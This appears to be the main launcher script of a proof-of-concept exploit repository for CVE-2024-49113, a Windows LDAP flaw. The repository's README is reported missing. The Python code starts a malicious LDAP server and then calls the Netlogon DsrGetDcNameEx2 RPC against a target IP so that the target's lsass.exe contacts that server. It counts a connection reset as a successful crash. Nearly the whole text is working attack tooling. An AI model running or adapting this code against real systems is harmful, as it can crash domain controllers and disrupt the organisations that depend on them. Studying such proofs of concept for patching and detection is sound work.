README.md
README.md not found for CVE-2024-49113. The file may not exist in the repository.
import time
import asyncio
import argparse
import threading
from logger import logger
from rpc_call import DsrGetDcNameEx2
from exploit_server import run_exploit_server
def start_ldap_server(listen_port: int):
"""Run the async LDAP server in this thread."""
asyncio.run(run_exploit_server(listen_port))
def main():
parser = argparse.ArgumentParser(
description="Call NRPC DsrGetDcNameEx2 via Impacket"
)
parser.add_argument("target_ip", help="Target IP address (required)")
parser.add_argument(
"--port", "-p",
type=int,
default=49664,
help="TCP port for RPC (default: 49664)"
)
parser.add_argument(
"--listen-port", "-l",
type=int,
default=389,
help="UDP port for exploit server listen (default: 389)"
)
parser.add_argument(
"--domain-name", "-d",
required=True,
help="DomainName parameter"
)
parser.add_argument(
"--account", "-a",
default="Administrator",
help="AccountName parameter (default: Administrator)"
)
parser.add_argument(
"--site-name", "-s",
default="",
help="SiteName parameter (default: empty string)"
)
args = parser.parse_args()
# 1. Start the exploit server in a background thread.
server_thread = threading.Thread(target=start_ldap_server, daemon=True, args=(args.listen_port,))
server_thread.start()
# 2. Optionally, wait a moment to ensure server is listening
logger.info("Waiting for udp server to start...")
time.sleep(2)
# 3. Now call your RPC function
logger.info("Calling DsrGetDcNameEx2 now...")
try:
DsrGetDcNameEx2(
target_ip=args.target_ip,
port=args.port,
account=args.account,
site_name=args.site_name,
domain_name=args.domain_name
)
logger.error("Failed to trigger the vulnerability!")
except ConnectionResetError:
# Netlogon is implemented inside the lsass.exe process,
# So the connection will be reset after the exploit is triggered.
logger.info("Successfuly triggered the vulnerability!")
if __name__ == "__main__":
main()